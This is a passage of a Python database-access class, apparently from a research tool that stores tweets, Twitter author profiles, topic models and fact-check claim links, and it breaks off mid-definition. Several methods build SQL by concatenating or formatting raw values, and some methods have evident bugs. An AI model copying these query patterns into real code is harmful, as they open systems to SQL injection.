def delete_temp_author_connections(self, temp_author_connections):\n total = len(temp_author_connections)\n current = 0\n for author_connection in temp_author_connections:\n current += 1\n msg = '\\r adding ' + str(current) + ' of ' + str(total) + ' author_connections'\n print(msg, end=\"\")\n self.delete_temp_author_connection(author_connection)\n self.session.commit()\n\n def delete_temp_author_connection(self, temp_author_connection):\n query = \"\"\"\n DELETE FROM temp_author_connections\n WHERE source_author_osn_id = :source_id\n AND destination_author_osn_id = :destination_id\n AND connection_type = :connection_type\n \"\"\"\n query = text(query)\n self.session.execute(query, params=dict(source_id=temp_author_connection.source_author_osn_id,\n destination_id=temp_author_connection.destination_author_osn_id,\n connection_type=temp_author_connection.connection_type))\n\n def create_post_retweeter_connections(self, post_id, retweeter_ids):\n post_retweeter_connections = []\n retweeter_connection_type = str(\"post_retweeter\")\n for retweeter_id in retweeter_ids:\n post_retweeter_connection = self.create_post_retweeter_connection(post_id, retweeter_id,\n retweeter_connection_type)\n post_retweeter_connections.append(post_retweeter_connection)\n\n return post_retweeter_connections\n\n def create_post_retweeter_connection(self, post_id, retweeter_id, connection_type):\n post_retweeter_connection = PostRetweeterConnection()\n\n post_retweeter_connection.post_osn_id = post_id\n post_retweeter_connection.retweeter_twitter_id = retweeter_id\n post_retweeter_connection.connection_type = str(connection_type)\n post_retweeter_connection.insertion_date = str(get_current_time_as_string())\n\n return post_retweeter_connection\n\n def convert_temp_author_connections_to_author_connections(self, domain):\n cursor = self.get_temp_author_connections()\n temp_author_connection_tuples = self.result_iter(cursor)\n\n author_osn_id_author_guid_dict = self.create_author_osn_id_author_guid_dictionary(domain)\n\n author_connections = []\n already_converted_temp_author_connections = []\n for temp_author_connection in temp_author_connection_tuples:\n source_author_osn_id = temp_author_connection[0]\n destination_author_osn_id = temp_author_connection[1]\n connection_type = temp_author_connection[2]\n insertion_date = temp_author_connection[3]\n\n if source_author_osn_id in author_osn_id_author_guid_dict and destination_author_osn_id in author_osn_id_author_guid_dict:\n source_author_guid = author_osn_id_author_guid_dict[source_author_osn_id]\n destination_author_guid = author_osn_id_author_guid_dict[destination_author_osn_id]\n\n author_connection = self.create_author_connection(source_author_guid, destination_author_guid, 0,\n connection_type, insertion_date)\n already_convert_temp_author_connection = self.create_temp_author_connection(source_author_osn_id,\n destination_author_osn_id,\n connection_type,\n insertion_date)\n\n author_connections.append(author_connection)\n already_converted_temp_author_connections.append(already_convert_temp_author_connection)\n self.save_author_connections(author_connections)\n self.delete_temp_author_connections(already_converted_temp_author_connections)\n\n def create_author_osn_id_author_guid_dictionary(self, domain):\n author_osn_id_author_guid_dict = {}\n authors = self.get_authors_by_domain(domain)\n for author in authors:\n author_osn_id = author.author_osn_id\n author_guid = author.author_guid\n author_osn_id_author_guid_dict[author_osn_id] = author_guid\n return 
author_osn_id_author_guid_dict\n\n def get_topic_with_maximal_posts(self):\n query = \"\"\"\n SELECT res.topic_id, MAX(res.post_count)\n FROM (\n SELECT topic_stats.topic_id, topic_stats.post_count\n FROM topic_stats\n GROUP BY 1\n ORDER BY 2 DESC\n ) res\n \"\"\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n generator = self.result_iter(cursor)\n for tuple in generator:\n return tuple\n\n def get_top_terms_by_topic_id(self, topic_id):\n query = \"\"\"\n SELECT topics.term_id, terms.description, topics.probability\n FROM topics\n INNER JOIN terms ON (terms.term_id = topics.term_id)\n WHERE topics.topic_id = {}\n ORDER BY 3 DESC\n LIMIT 100\n \"\"\".format(topic_id)\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n generator = self.result_iter(cursor)\n top_terms = [term[1] for term in generator]\n return top_terms\n\n def get_top_10_terms_by_topic_id(self, topic_id):\n query = \"\"\"\n SELECT topics.term_id, terms.description, topics.probability\n FROM topics\n INNER JOIN terms ON (terms.term_id = topics.term_id)\n WHERE topics.topic_id = {}\n ORDER BY 3 DESC\n LIMIT 10\n \"\"\".format(topic_id)\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n generator = self.result_iter(cursor)\n top_terms = [term[1] for term in generator]\n return top_terms\n\n def create_post_from_tweet_data(self, tweet_data, domain):\n author_name = tweet_data.user.screen_name\n tweet_author_guid = compute_author_guid_by_author_name(author_name)\n tweet_post_twitter_id = str(tweet_data.id)\n tweet_url = generate_tweet_url(tweet_post_twitter_id, author_name)\n tweet_creation_time = tweet_data.created_at\n tweet_str_publication_date = extract_tweet_publiction_date(tweet_creation_time)\n tweet_guid = compute_post_guid(post_url=tweet_url, author_name=author_name,\n str_publication_date=tweet_str_publication_date)\n\n media_path = None\n if tweet_data.media is not None:\n if tweet_data.media[0] is not None:\n media_url = tweet_data.media[0].media_url\n media_path = str(media_url)\n post = Post(guid=tweet_guid, post_id=tweet_guid, url=str(tweet_url),\n date=str_to_date(tweet_str_publication_date),\n title=str(tweet_data.text), content=str(tweet_data.text),\n post_osn_id=tweet_post_twitter_id,\n author=str(author_name), author_guid=str(tweet_author_guid),\n domain=str(domain),\n media_path=media_path,\n retweet_count=str(tweet_data.retweet_count),\n favorite_count=str(tweet_data.favorite_count),\n timeline_importer_insertion_date=str(get_current_time_as_string()))\n return post\n\n def get_max_topic(self):\n query = \"\"\"\n SELECT MAX(topics.topic_id)\n FROM topics\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n rows = cursor.fetchall()\n max_topic = rows[0][0]\n return max_topic\n\n def _get_top_terms_by_topic_id(self, topic_id, num_of_top_terms):\n query = \"\"\"\n SELECT topics.topic_id, terms.description, topics.probability\n FROM topics\n INNER JOIN terms on (topics.term_id = terms.term_id)\n WHERE topics.topic_id = {0}\n ORDER BY topics.probability DESC\n LIMIT {1}\n \"\"\".format(topic_id, num_of_top_terms)\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n\n top_terms = [tuple[1] for tuple in tuples]\n return top_terms\n\n def _randomize_authors(self, min_posts_count, domain, num_of_random_authors):\n query = \"\"\"\n SELECT authors.author_guid, authors.author_type\n FROM 
authors\n INNER JOIN author_guid_num_of_posts_view ON (author_guid_num_of_posts_view.author_guid = authors.author_guid)\n WHERE author_guid_num_of_posts_view.num_of_posts >= :min_posts_count\n AND authors.domain = :domain\n ORDER BY RANDOM()\n LIMIT :num_of_random_authors\n \"\"\"\n query = text(query)\n result = self.session.execute(query, params=dict(min_posts_count=min_posts_count, domain=domain,\n num_of_random_authors=num_of_random_authors))\n cursor = result.cursor\n randomized_authors_for_graph = self.result_iter(cursor)\n return randomized_authors_for_graph\n\n def _create_randomized_author_for_graph(self, author_guid, author_type):\n randomized_author_for_graph = RandomAuthorForGraph()\n randomized_author_for_graph.author_guid = author_guid\n randomized_author_for_graph.author_type = author_type\n return randomized_author_for_graph\n\n def randomize_authors_for_graph(self, min_posts_count, domain, num_of_random_authors_for_graph):\n randomized_authors = []\n randomized_authors_for_graph = self._randomize_authors(min_posts_count, domain, num_of_random_authors_for_graph)\n for author_guid, author_type in randomized_authors_for_graph:\n randomized_author_for_graph = self._create_randomized_author_for_graph(author_guid, author_type)\n randomized_authors.append(randomized_author_for_graph)\n self.addPosts(randomized_authors)\n\n def deleteTopics(self, window_start=None):\n if window_start:\n self.session.query(Topic).filter(Topic.window_start == window_start).delete()\n self.session.query(Post_to_topic).filter(Post_to_topic.window_start == window_start).delete()\n else:\n self.session.query(Topic).delete()\n self.session.query(Post_to_topic).delete()\n self.session.commit()\n\n def addTopics(self, topics):\n for topic in topics:\n self.addTopic(topic)\n self.session.commit()\n\n def addTopic(self, topic):\n self.session.merge(topic)\n\n def addPostTopicMapping(self, topic_mapping):\n self.session.merge(topic_mapping)\n\n def addPostTopicMappings(self, post_topic_mappings):\n for i, topic_mapping in enumerate(post_topic_mappings):\n self.addPostTopicMapping(topic_mapping)\n if i % 100 == 0:\n msg = \"\\rAdd post topic mappings {0}/{1}\".format(str(i), str(len(post_topic_mappings)))\n print(msg, end='')\n msg = \"\\rAdd post topic mappings {0}/{1}\".format(str(len(post_topic_mappings)), str(len(post_topic_mappings)))\n print(msg, end='')\n self.session.commit()\n\n def add_terms(self, terms):\n for term in terms:\n self.add_term(term)\n self.session.commit()\n\n def add_term(self, term):\n self.session.merge(term)\n\n def add_topic_items(self, topic_items):\n for topic_item in topic_items:\n self.add_topic_item(topic_item)\n self.session.commit()\n\n def add_topic_item(self, topic_item):\n self.session.merge(topic_item)\n\n def create_author_topic_mapping_table(self, number_of_topics):\n query = \"\"\"\n CREATE TABLE IF NOT EXISTS author_topic_mapping (\n author_guid text NOT NULL,\n {0}\n CONSTRAINT PK_Person PRIMARY KEY (author_guid),\n FOREIGN KEY (author_guid) REFERENCES authors(author_guid));\n \"\"\"\n topics = \"\"\n for i in range(number_of_topics):\n topics += \"'{0}' int NOT NULL,\\n\".format(i)\n query = query.format(topics)\n query = text(query)\n self.session.execute(query)\n\n def insert_into_author_toppic_mapping(self, author_guid, author_mapping):\n\n query = \"\"\"\n INSERT INTO author_topic_mapping \n VALUES ('{0}',{1});\n \"\"\"\n author_mapping = ','.join([str(m) for m in author_mapping])\n\n query = query.format(author_guid, author_mapping)\n query = text(query)\n self.session.execute(query)\n\n def 
insert_into_author_toppic_mappings(self, mappings):\n if len(mappings) > 0:\n author_mappings = []\n author_guids = []\n for author_guid, author_mapping in mappings:\n mapping_tamplate = \"('{0}',{1})\"\n author_mapping = ','.join([str(m) for m in author_mapping])\n author_mappings.append(mapping_tamplate.format(author_guid, author_mapping))\n author_guids.append(\"'{0}'\".format(author_guid))\n\n self.delete_author_topic_mapping_by_author_guids(author_guids)\n\n for i in range(int(len(mappings) / 10000 + 1)):\n author_topic_mapping_count = str(min((i + 1) * 10000, len(mappings)))\n print('\\r add author_topic_mappings {}/{}'.format(author_topic_mapping_count, len(mappings)), end='')\n query = \"\"\" \n INSERT INTO author_topic_mapping \n VALUES {0};\n \"\"\"\n query = query.format(',\\n'.join(author_mappings[i * 10000: (i + 1) * 10000]))\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n print()\n\n def delete_author_topic_mapping_by_author_guids(self, author_guids):\n query = \"\"\"\n DELETE FROM author_topic_mapping\n WHERE author_guid IN ({0});\n \"\"\"\n query = query.format(','.join(author_guids))\n query = text(query)\n self.session.execute(query)\n\n def delete_terms(self):\n self.session.query(Term).delete()\n self.session.commit()\n\n def delete_post_topic_mapping(self):\n self.session.query(PostTopicMapping).delete()\n self.session.commit()\n\n def delete_author_topic_mapping(self):\n query = \"\"\"\n DROP TABLE IF EXISTS author_topic_mapping;\n \"\"\"\n query = text(query)\n self.session.execute(query)\n\n def get_terms(self):\n return self.session.query(Term).all()\n\n def get_author_topic_mapping(self):\n query = \"\"\"\n SELECT * FROM author_topic_mapping\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n return result.cursor.fetchall()\n\n def get_post_topic_mapping(self):\n return self.session.query(PostTopicMapping).all()\n\n def get_number_of_topics(self):\n return self.session.execute(\"select count(distinct( topic_id)) from topics\").scalar()\n\n @staticmethod\n def create_post_topic_mapping_obj(max_topic_probability, post_id):\n ptm = PostTopicMapping()\n ptm.post_id = post_id\n ptm.max_topic_dist = float(max_topic_probability[1])\n ptm.max_topic_id = int(max_topic_probability[0])\n return ptm\n\n @staticmethod\n def create_topic_item(topic_id, term_id, probability):\n topic_obj = Topic()\n topic_obj.topic_id = topic_id\n topic_obj.term_id = term_id\n topic_obj.probability = probability\n return topic_obj\n\n @staticmethod\n def create_term(term_id, term_description):\n term = Term()\n term.term_id = term_id\n term.description = term_description\n return term\n\n def get_targeted_articles(self):\n targetd_articles = self.session.query(Target_Article).all()\n return targetd_articles\n\n def get_targeted_article_items(self):\n targetd_articles = self.session.query(Target_Article_Item).all()\n return targetd_articles\n\n def get_text_images(self):\n text_images = self.session.query(Text_From_Image).all()\n return text_images\n\n def get_authors_with_media(self):\n query = \"\"\"SELECT authors.name, authors.media_path FROM authors\n WHERE authors.media_path IS NOT NULL\"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_authors_and_image_tags(self):\n query = \"\"\"SELECT * FROM image_tags\"\"\"\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def 
get_post_id_to_author_guid_mapping(self):\n query = \"\"\"\n SELECT posts.author_guid, posts.post_id \n FROM posts\n \"\"\"\n result = self.session.execute(query)\n cursor = result.cursor\n records = self.result_iter(cursor)\n records = list(records)\n\n return {record[1]: record[0] for record in records}\n\n def get_author_guid_word_embedding_vector_dict(self, word_embedding_table_name, table_name, targeted_field_name,\n word_embedding_type):\n query = self._get_author_guid_word_embedding_vector_full_query(word_embedding_table_name, table_name,\n targeted_field_name, word_embedding_type)\n result = self.session.execute(query)\n return self._create_author_guid_word_embedding_vector_dict_by_query(result)\n\n def get_random_author_guid_word_embedding_vector_dict(self, table_name, targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph):\n # default to the author_word_embeddings table, matching _get_word_embeddings_types below\n query = self._get_random_author_guid_word_embedding_vector_full_query(\"author_word_embeddings\", table_name,\n targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph)\n result = self.session.execute(query)\n return self._create_author_guid_word_embedding_vector_dict_by_query(result)\n\n def _get_word_embeddings_types(self, author_word_embeddings=\"author_word_embeddings\"):\n query = \"SELECT word_embedding_type from %s GROUP BY 1\" % author_word_embeddings\n result = self.session.execute(query).fetchall()\n parsed = [col[0] for col in result]\n return parsed\n\n def _get_author_guid_word_embedding_vector_full_query(self, word_embedding_table_name, table_name,\n targeted_field_name, word_embedding_type):\n query = \"\"\"\n SELECT *\n FROM {0}\n WHERE table_name = '{1}'\n AND targeted_field_name = '{2}'\n AND word_embedding_type = '{3}'\n AND author_id IS NOT NULL\n \"\"\".format(word_embedding_table_name, table_name, targeted_field_name, word_embedding_type)\n return query\n\n def _get_random_author_guid_word_embedding_vector_full_query(self, word_embedding_table_name, table_name,\n targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph):\n query = \"\"\"\n SELECT *\n FROM {0}\n WHERE table_name = '{1}'\n AND targeted_field_name = '{2}'\n AND word_embedding_type = '{3}'\n AND author_id IS NOT NULL\n LIMIT {4}\n \"\"\".format(word_embedding_table_name, table_name, targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph)\n return query\n\n def _create_author_guid_word_embedding_vector_dict_by_query(self, result):\n cursor = result.cursor\n records = self.result_iter(cursor)\n # records = list(records)\n return self.create_author_guid_word_embedding_dict_by_recoreds(records)\n\n def create_author_guid_word_embedding_dict_by_recoreds(self, records):\n author_guid_word_embedding_vector = {}\n for record in records:\n author_guid = record[0]\n selected_table_name = record[1]\n selected_targeted_field_name = record[3]\n selected_word_embedding_type = record[4]\n vector = record[5:]\n # vector_str = np.array(vector_str)\n # vector = vector_str.astype(np.float)\n author_guid_word_embedding_vector[author_guid] = vector\n return author_guid_word_embedding_vector\n\n def 
get_word_embedding_dictionary(self):\n query = \"\"\"SELECT * FROM wikipedia_model_300d\"\"\"\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n records = list(tuples)\n ans = {record[0]: record[1:301] for record in records}\n return ans\n\n def get_author_word_embedding_table(self):\n query = \"\"\"SELECT * FROM author_word_embeddings\"\"\"\n query = self.session.execute(query)\n results = pd.read_sql_table('author_word_embeddings', self.engine)\n return results\n\n def get_author_word_embedding(self, author_guid, table_name, target_field_name, author_word_embeddings):\n ans = {}\n columns = self._get_word_embeddings_types(author_word_embeddings)\n ans = {str(col): self.get_author_guid_word_embedding_vector_dict(author_word_embeddings, table_name,\n target_field_name, col)[author_guid] for\n col in columns}\n # ans[u'min'] = self.get_author_guid_word_embedding_vector_dict(table_name, target_field_name, u'min')[author_guid]\n # ans[u'max'] = self.get_author_guid_word_embedding_vector_dict(table_name, target_field_name, u'max')[author_guid]\n # ans[u'np.mean'] = self.get_author_guid_word_embedding_vector_dict(table_name, target_field_name, u'np.mean')[author_guid]\n return ans\n\n def get_records_by_id_targeted_field_and_table_name(self, id_field, targeted_field_name, table_name, where_clauses):\n query = \"\"\"\n SELECT {0}, {1}\n FROM {2}\n \"\"\".format(id_field, targeted_field_name, table_name)\n\n is_first_condition = False\n for where_clause_dict in where_clauses:\n field_name = where_clause_dict['field_name']\n value = where_clause_dict['value']\n if is_first_condition == False:\n condition_clause = \"\"\"\n WHERE {0} = {1}\n \"\"\".format(field_name, value)\n is_first_condition = True\n else:\n condition_clause = \"\"\"\n AND {0} = {1}\n \"\"\".format(field_name, value)\n query += condition_clause\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_word_vector_dictionary(self, table_name):\n query = \"\"\"\n SELECT *\n FROM {0}\n \"\"\".format(table_name)\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n\n word_vector_dict = defaultdict()\n for tuple in tuples:\n word = tuple[0]\n vector = tuple[1:]\n word_vector_dict[word] = vector\n return word_vector_dict\n\n def fill_author_type_by_post_type(self):\n logging.info(\"fill_author_type_by_post_type\")\n query = 'UPDATE authors SET author_type = (SELECT post_type FROM posts where posts.author_guid = authors.author_guid)'\n query = text(query)\n try:\n self.session.execute(query)\n except Exception as exc:\n logging.error(\"Fillin author type by post type failed\")\n finally:\n self.session.commit()\n\n def get_item_by_targeted_fields_dict_and_id(self, targeted_fields_dict, id_val):\n query = \"SELECT * FROM \" + targeted_fields_dict['table_name'] + \" where \" + targeted_fields_dict[\n 'id_field'] + \" = '\" + id_val + \"'\"\n result = self.session.execute(query)\n cursor = result.cursor\n\n result = cursor.fetchall()[0]\n return result\n\n def get_dict_idfield_to_item(self, targeted_fields_dict):\n id_field = targeted_fields_dict['id_field']\n query = 'select * from ' + targeted_fields_dict['table_name']\n answer = self.session.execute(text(query))\n return dict((getattr(item, id_field), item) for item in self.result_iter(answer))\n\n def get_author_id_by_field_id(self, field_id, id_val):\n if field_id == 
\"post_id\":\n query = 'SELECT author_guid FROM posts WHERE post_id=' + id_val\n answer = self.session.execute(text(query))\n cursor = answer.cursor\n result = cursor.fetchall()[0]\n return result[0]\n if field_id == \"author_guid\":\n return id_val\n\n def get_liar_dataset_records(self):\n liar_dataset_records = self.session.query(Politifact_Liar_Dataset).all()\n return liar_dataset_records\n\n def randomize_authors(self, min_number_of_posts_per_author, domain, authors_table_field_name,\n authors_table_value, num_of_random_authors):\n randomized_authors = []\n randomized_authors_for_graph = self._randomize_authors_by_conditions(min_number_of_posts_per_author,\n domain, authors_table_field_name,\n authors_table_value,\n num_of_random_authors)\n for author_guid, author_type in randomized_authors_for_graph:\n randomized_author_for_graph = self._create_randomized_author_for_graph(author_guid, author_type)\n randomized_authors.append(randomized_author_for_graph)\n\n self.addPosts(randomized_authors)\n\n def _randomize_authors_by_conditions(self, min_posts_count, domain, authors_table_field_name,\n authors_table_value, num_of_random_authors):\n\n query = \"\"\"\n SELECT authors.author_guid, authors.author_type\n FROM authors\n INNER JOIN author_guid_num_of_posts_view ON (author_guid_num_of_posts_view.author_guid = authors.author_guid)\n WHERE author_guid_num_of_posts_view.num_of_posts >= {0}\n AND authors.domain = '{1}'\n AND authors.{2} = '{3}'\n ORDER BY RANDOM()\n LIMIT {4}\n \"\"\".format(min_posts_count, domain, authors_table_field_name, authors_table_value,\n num_of_random_authors)\n query = text(query)\n result = self.session.execute(query, params=dict(min_posts_count=min_posts_count, domain=domain,\n num_of_random_authors=num_of_random_authors))\n cursor = result.cursor\n randomized_authors_for_graph = self.result_iter(cursor)\n return randomized_authors_for_graph\n\n def get_author_screen_name_author_guid_dictionary(self):\n query = \"\"\"\n SELECT authors.author_screen_name, authors.author_guid\n FROM authors\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n author_screen_name_author_guid_dict = {}\n for tuple in tuples:\n author_screen_name = tuple[0]\n author_guid = tuple[1]\n author_screen_name_author_guid_dict[author_screen_name] = author_guid\n return author_screen_name_author_guid_dict\n\n def get_resturant_api_id_to_resturant_dict(self):\n authors = self.get_all_authors()\n authors_dict = dict((str(aut.author_guid).encode('utf-8'), aut) for aut in authors)\n return authors_dict\n\n def fix_guids_encoding(self):\n guids = self.get_author_guids()\n for guid in guids:\n new_guid = str(guid).encode('ascii', 'ignore').decode('ascii')\n update_query = \"UPDATE \" + self.authors + \" SET author_guid ='\" + new_guid + \"' WHERE author_guid ='\" + guid + \"'\"\n self.update_query(update_query)\n\n def get_politifact_speaker_by_author(self, author):\n query = text(\"SELECT party_affiliation FROM politifact_liar_dataset where post_guid ='\" + author + \"'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())[0]\n return records\n\n def export_word_embeddings_to_tsv(self):\n embeddings_dict = self.get_author_guid_word_embedding_vector_dict('posts', 'content', 'max')\n file = open(\"D:\\\\Work\\\\BadActorsFolder\\\\trunk\\\\software\\\\bad_actors\\\\data\\\\output\\\\word_embeddings_mean2.tsv\",\n 'wb')\n file_labled = open(\n 
\"D:\\\\Work\\\\BadActorsFolder\\\\trunk\\\\software\\\\bad_actors\\\\data\\\\output\\\\word_embeddings_mean_lables.tsv\",\n 'wb')\n writer = csv.writer(file, delimiter='\\t')\n counter = 0\n for author in embeddings_dict:\n record = embeddings_dict[author]\n counter += 1\n str_record = str(record)[1:-1]\n str_record = str_record.replace(', ', '\\t')\n file.write(str_record + '\\n')\n\n author_type = (self.get_author_by_guid(author)).author_type\n author = self.get_politifact_speaker_by_author(author)[0]\n\n file_labled.write(author + '\\t' + author_type + '\\n')\n file.close()\n file_labled.close()\n\n ##\n ## Added for solving the issue of US Elections\n ##\n\n def convert_tweets_to_posts_and_authors(self, tweets, domain):\n posts = []\n authors = []\n for tweet in tweets:\n post, author = self._convert_tweet_to_post_and_author(tweet, domain)\n posts.append(post)\n authors.append(author)\n\n posts = list(set(posts))\n authors = list(set(authors))\n return posts, authors\n\n def _convert_tweet_to_post_and_author(self, tweet, domain):\n post = self._convert_tweet_to_post(tweet, domain)\n author = self._convert_tweet_to_author(tweet, domain)\n\n return post, author\n\n def convert_tweet_to_user_mentions(self, tweet, post_guid):\n tweet_user_mentions = tweet.user_mentions\n user_mentions = []\n for tweet_user_mention in tweet_user_mentions:\n user_mention = PostUserMention()\n\n user_mention.post_guid = post_guid\n user_mention.user_mention_twitter_id = tweet_user_mention.id_str\n user_mention.user_mention_screen_name = tweet_user_mention.screen_name\n\n user_mentions.append(user_mention)\n return user_mentions\n\n def _convert_tweet_to_post(self, tweet, domain):\n post = Post()\n\n tweet_id = tweet.id_str\n post.post_osn_id = tweet_id\n post.retweet_count = tweet.retweet_count\n post.favorite_count = tweet.favorite_count\n post.content = tweet.text\n\n user = tweet.user\n screen_name = user.screen_name\n post.author = screen_name\n\n url = \"https://twitter.com/{0}/status/{1}\".format(screen_name, tweet_id)\n post.url = url\n\n created_at = tweet.created_at\n post.created_at = created_at\n tweet_str_publication_date = str(extract_tweet_publiction_date(created_at))\n tweet_creation_date = str_to_date(tweet_str_publication_date)\n post.date = tweet_creation_date\n post.domain = domain\n\n post_guid = compute_post_guid(url, screen_name, tweet_str_publication_date)\n post.post_id = post_guid\n post.guid = post_guid\n\n author_guid = compute_author_guid_by_author_name(screen_name)\n post.author_guid = author_guid\n post.post_format = tweet.lang\n return post\n\n def _convert_tweet_to_author(self, tweet, domain):\n\n author = Author()\n\n user = tweet.user\n screen_name = user.screen_name\n author_guid = compute_author_guid_by_author_name(screen_name)\n\n author.author_guid = author_guid\n author.name = screen_name\n author.author_screen_name = screen_name\n author.created_at = user.created_at\n author.description = user.description\n author.favourites_count = user.favourites_count\n author.followers_count = user.followers_count\n author.friends_count = user.friends_count\n author.statuses_count = user.statuses_count\n\n author.geo_enabled = user.geo_enabled\n\n user_id = user.id_str\n author.author_osn_id = user_id\n author.language = user.lang\n author.listed_count = user.listed_count\n author.profile_background_color = user.profile_background_color\n author.profile_image_url = user.profile_background_image_url\n author.profile_background_tile = user.profile_background_tile\n 
author.profile_banner_url = user.profile_banner_url\n author.profile_link_color = user.profile_link_color\n\n author.profile_sidebar_fill_color = user.profile_sidebar_fill_color\n author.profile_text_color = user.profile_text_color\n author.location = user.location if user.location != None else None\n author.protected = user.protected if user.protected != None else None\n author.time_zone = user.time_zone if user.time_zone != None else None\n author.url = user.url if user.url != None else None\n author.utc_offset = user.utc_offset if user.utc_offset != None else None\n author.domain = domain\n author.verified = user.verified\n\n return author\n\n def add_claim_connections(self, claim_connections):\n i = 1\n for claim in claim_connections:\n if (i % 100 == 0):\n msg = \"\\r Insert claim_connection to DB: [{}\".format(i) + \"/\" + str(len(claim_connections)) + ']'\n print(msg, end=\"\")\n i += 1\n self.session.merge(claim)\n msg = \"\\r Insert claim_connection to DB: [{}\".format(i) + \"/\" + str(len(claim_connections)) + ']'\n print(msg)\n self.commit()\n\n def get_claim_tweet_connections(self):\n q = \"\"\"\n SELECT *\n FROM claim_tweet_connection \n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_claim_ordered_by_num_of_posts(self):\n q = \"\"\"\n SELECT claim_tweet_connection.claim_id, COUNT(claim_tweet_connection.post_id)\n FROM claim_tweet_connection \n GROUP BY 1\n ORDER BY 2 DESC \n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_table_by_name(self, table_name):\n for var in globals():\n class_obj = globals()[var]\n try:\n if issubclass(class_obj, Base) and class_obj.__tablename__ == table_name:\n return class_obj\n except:\n pass\n return None\n\n def get_verified_authors(self):\n results = self.session.query(Author).filter(Author.verified == '1').all()\n return results\n\n def get_post_osn_ids(self):\n q = \"\"\"\n SELECT post_osn_id\n FROM posts\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_posts_by_selected_domain(self, domain):\n q = \"\"\"\n SELECT posts.post_id, posts.post_type\n FROM posts\n WHERE posts.domain = :domain\n \"\"\"\n query = text(q)\n result = self.session.execute(query, params=dict(domain=domain))\n return list(result)\n\n def get_claim_id_posts_dict(self):\n claim_id_posts_dict = defaultdict(list)\n post_dict = self.get_post_dictionary()\n for claim_id, post_id in self.get_claim_tweet_connections():\n claim_id_posts_dict[claim_id].append(post_dict[post_id])\n return claim_id_posts_dict\n\n def get_claim_posts(self, limit = 1):\n # table_elements = self.session.query(connection_source_attr, destination_table) \\\n # .join(source_table, connection_source_attr == source_id_attr) \\\n # .join(destination_table, connection_target_attr == destination_id_attr) \\\n # .filter(and_(condition for condition in conditions)) \\\n # .order_by(connection_source_attr) \\\n # .yield_per(10000).enable_eagerloads(False).offset(offset)\n\n\n claim_posts = self.session.query(Claim_Tweet_Connection.claim_id, Post)\\\n .join(Claim_Tweet_Connection, Post.post_id == Claim_Tweet_Connection.post_id)\\\n .order_by(Claim_Tweet_Connection.claim_id).yield_per(10000).enable_eagerloads(False)\n claim_id_posts = defaultdict(list)\n for i, (claim_id, post) in enumerate(claim_posts):\n if claim_id not in claim_id_posts and len(claim_id_posts) == limit:\n yield claim_id_posts\n claim_id_posts = defaultdict(list)\n\n 
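# each post is appended to its claim's bucket below; once `limit` distinct claims\n # have accumulated and a post for a new claim_id arrives, the filled batch is\n # yielded above and a fresh defaultdict is started for the next batch.\n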
claim_id_posts[claim_id].append(post)\n yield claim_id_posts\n\n def get_author_friends_by_sources(self, author_guids):\n author_connections = self.session.query(AuthorConnection.source_author_guid, AuthorConnection.destination_author_guid) \\\n .filter(and_(or_(AuthorConnection.source_author_guid.in_(author_guids), AuthorConnection.destination_author_guid.in_(author_guids)), AuthorConnection.connection_type == 'friend')).yield_per(10000).enable_eagerloads(False)\n\n author_friends = defaultdict(set)\n for i, (source_author, dest_author) in enumerate(author_connections):\n author_friends[source_author].add(dest_author)\n author_friends[dest_author].add(source_author)\n return author_friends\n\n def get_claim_post_author_connections_with_verdict(self):\n q = \"\"\"\n SELECT claim_tweet_connection.claim_id, claim_tweet_connection.post_id, posts.author_guid, claims.verdict\n FROM claim_tweet_connection\n INNER JOIN posts ON (posts.post_id = claim_tweet_connection.post_id)\n INNER JOIN claims ON (claims.claim_id = claim_tweet_connection.claim_id)\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_claim_post_author_connections(self):\n q = \"\"\"\n SELECT claim_tweet_connection.claim_id, claim_tweet_connection.post_id, posts.author_guid\n FROM claim_tweet_connection\n INNER JOIN posts ON (posts.post_id = claim_tweet_connection.post_id)\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def delete_author_sub_type(self):\n # SQL SET clauses take an unqualified column name ('author.author_sub_type' is invalid here)\n query = '''\n UPDATE authors\n SET author_sub_type = NULL\n '''\n self.update_query(query)\n\n def add_claim_keywords_connection(self, claim_id, type, keywords):\n claim_keywords_connections = Claim_Keywords_Connections()\n claim_keywords_connections.claim_id = claim_id\n claim_keywords_connections.keywords = keywords\n claim_keywords_connections.type = type\n self.addPost(claim_keywords_connections)\n\n def add_claim_keywords_connections(self, connections):\n self.addPosts(connections)\n\n def get_claim_keywords_connections(self):\n return self.session.query(Claim_Keywords_Connections).all()\n\n def get_claim_keywords_connections_by_type(self, type):\n return self.session.query(Claim_Keywords_Connections).filter(Claim_Keywords_Connections.type == type).all()\n\n def get_claim_id_keywords_dict_by_connection_type(self, type):\n connections = self.get_claim_keywords_connections_by_type(type)\n return {connection.claim_id: connection.keywords for connection in connections}\n\n def add_claim_tweet_connections_fast(self, claim_post_connections):\n table_name = 'claim_tweet_connections'\n self.add_entity_fast(table_name, claim_post_connections)\n\n def add_posts_fast(self, 